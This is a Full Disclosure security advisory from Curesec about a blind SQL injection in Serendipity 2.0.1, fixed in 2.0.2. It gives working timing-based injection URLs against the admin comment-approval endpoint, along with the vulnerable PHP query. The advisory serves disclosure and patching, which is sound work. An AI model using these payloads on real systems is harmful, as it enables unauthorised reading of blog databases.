Serendipity 2.0.1 - Blind SQL Injection

["Curesec Research Team (CRT)" <crt () curesec com>]

Serendipity 2.0.1: Blind SQL Injection
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:       Serendipity 2.0.1       
Fixed in:               2.0.2
Fixed Version Link:
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip

Vendor Contact:         serendipity () supergarv de     
Vulnerability Type:     Blind SQL Injection     
Remote Exploitable:     Yes     
Reported to vendor:     07/21/2015      
Disclosed to public:    09/01/2015      
Release mode:           Coordinated release     
CVE:    n/a     
Credits                 Tim Coen of Curesec GmbH        

2. Vulnerability Description

There is a blind SQL injection in Serendipity 2.0.1 when approving
comments. It can be exploited content-based, but this requires an Email
token. Timing-based exploitation does not require a token and is thus
easier to exploit.

To prepare for the attack, an attacker has to visit the Configuration
and set "Use Tokens for Comment Moderation" to true.

Please note that admin credentials are required.

3. Proof of Concept


http://localhost/serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=pending&serendipity[id]=8'
AND IF(SUBSTRING(version(), 1,
1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)
%23&serendipity[token]=ValidAntiCSRFToken
-> true

http://localhost//serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=approve&serendipity[id]=8'
AND IF(SUBSTRING(version(), 1,
1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)
%23&serendipity[token]=ValidAntiCSRFToken
-> false
Note that the id must be that of an existing comment, the action must be
acceptable - ie only pending comments can be approved and only approved
comments can be set to pending - and the CSRF token must be valid.

4. Code


        /include/admin/comments.inc.php
        serendipity_approveComment($serendipity['GET']['id'],
$rs['entry_id']); <- user input

        /include/functions_comments.inc.php
        function serendipity_approveComment($cid, $entry_id, $force =
false, $moderate = false, $token = false) {
            global $serendipity;

            $goodtoken = serendipity_checkCommentToken($token, $cid); <-
not secured
        [...]
        }

        function serendipity_checkCommentToken($token, $cid) {
            global $serendipity;

            $goodtoken = false;
            if ($serendipity['useCommentTokens']) {
                // Delete any comment tokens older than 1 week.
                serendipity_db_query("DELETE FROM
{$serendipity['dbPrefix']}options
                                      WHERE okey LIKE 'comment_%' AND
name < " . (time() - 604800) );
                // Get the token for this comment id
                $tokencheck = serendipity_db_query("SELECT * FROM
{$serendipity['dbPrefix']}options
                                                     WHERE okey =
'comment_" . $cid . "' LIMIT 1", true, 'assoc'); <- still not secured
        [...]
        }

5. Solution

To mitigate this issue please upgrade at least to version 2.0.2:

https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip

Please note that a newer version might already be available.

5. Report Timeline

07/21/2015      Informed Vendor about Issue
07/24/2015      Vendor releases Version 2.0.2
09/01/2015      Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/Serendipity-201-Blind-SQL-Injection-52.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/